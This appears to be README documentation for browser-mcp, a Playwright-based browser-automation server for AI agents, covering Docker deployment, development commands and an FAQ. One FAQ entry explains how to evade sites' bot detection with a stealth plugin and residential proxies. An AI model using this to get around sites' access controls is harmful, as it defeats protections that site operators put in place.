echo "BROWSER_MCP_API_KEY=$(openssl rand -hex 32)" > .env
docker compose upPre-built images from GHCR:
docker run --rm -p 7777:7777 -e BROWSER_MCP_API_KEY=$(openssl rand -hex 32) \
ghcr.io/graph-memory/browser-mcp:latestThe container:
- Uses
tinias PID 1 for zombie reaping when Chromium subprocesses die. - Runs Chromium as a dedicated non-root
browseruser. - Persists profiles in a Docker volume (
browser) at/home/browser/.browser-mcp. - Uses Playwright's bundled Chromium (
BROWSER_MCP_CHANNEL=chromiumset automatically —chromechannel isn't available inside the image). - Healthcheck:
node -e "fetch('http://127.0.0.1:7777/health')…"every 30 s. - Refuses to start without
BROWSER_MCP_API_KEY(the image binds to0.0.0.0, so the refuse-to-start guard kicks in).
browser_open_visible does not work in Docker (no display server). Use
it only in local/desktop setups.
- macOS / Linux / Windows — Node ≥ 22. Playwright installs Chromium on
first run via the package's
postinstallhook. chromechannel requires a locally-installed Chrome. On systems without it, use--channel=chromiumto fall back to Playwright's bundled build. The Docker image sets this automatically.- Sandboxed Linux containers may need extra caps for Chromium sandbox.
The official Dockerfile handles this; if you're using a different base
image, ensure
libnss3 libdbus-1-3 libgbm1 libasound2 libatk-bridge2.0-0(and friends) are installed.
git clone https://github.com/graph-memory/browser-mcp.git
cd browser-mcp
npm install
npm run dev # run with tsx (no build step)
npm run build # compile TypeScript to dist/
npm test # full test suite (304 tests)
npm run test:coverage# bump version
npm version patch # or minor / major
# push with tag
git push && git push --tagsTriggers publish.yml (npm publish) and docker.yml (image build). Both
run the full test suite first.
Does this replace WebFetch? No — they're complementary. WebFetch is
great for one-shot reads of public pages. browser-mcp is for sessions,
authentication, interaction, and anything that needs JavaScript / cookies /
state.
Why Playwright and not Puppeteer? Playwright has better role/label locators (Accessibility tree first-class), auto-waiting, and cross-browser support (though we only ship Chromium). Also the API has been more stable over the past year.
Can I run multiple browser-mcp instances on the same machine? Yes —
each on its own port (--port). They're independent processes with no
shared state. Different profile base directories (--profile-dir) if you
want isolation.
How do I log in to a site that blocks headless browsers? Run
browser_open_visible with the login URL. Chromium opens visibly with the
persistent profile so you can solve CAPTCHAs / 2FA. Close the window when
done — cookies land in the profile. Subsequent calls from your agent run
headless against the same profile and inherit the session.
Where are profile data stored? ~/.browser-mcp/profiles/<name>/ by
default (override via --profile-dir / BROWSER_MCP_PROFILE_DIR). These
are standard Chromium user-data-dirs — cookies.sqlite, Local Storage,
Service Worker caches, etc. Safe to delete to reset a profile.
The same profile is open in my regular Chrome — can browser-mcp attach? No. Chromium locks its user-data-dir with a singleton file; only one process can use a profile at a time. Either close your Chrome or use a dedicated browser-mcp profile.
browser_save pdf says "only headless"? Known Playwright/Chromium
limitation — print-to-PDF requires the headless browser. If you've disabled
headless mode (--no-headless), switch to mhtml (single-file archive) or
html (raw).
How do I bypass a specific site's bot detection? Start with the default
stealth plugin on. If that fails, try --no-stealth (some sites detect
stealth itself). Otherwise, fingerprinting is an arms race you're unlikely
to win with a generic tool — consider a residential proxy
(--proxy socks5://user:pass@host:port) or manual sessions via
browser_open_visible.
Can I intercept / mock network requests? Not yet. Currently you can
only observe requests via browser_network_log. Intercept/mock is
intentionally excluded for now — it's a large surface and hasn't come up
as a blocker in real use.
Can I record my session as a Playwright script? Not yet. Same scope decision as network intercept.
Why no test:windows in CI? Not yet wired up. The code has no POSIX
specifics outside the Dockerfile, so Windows should work — it's just not
validated by CI.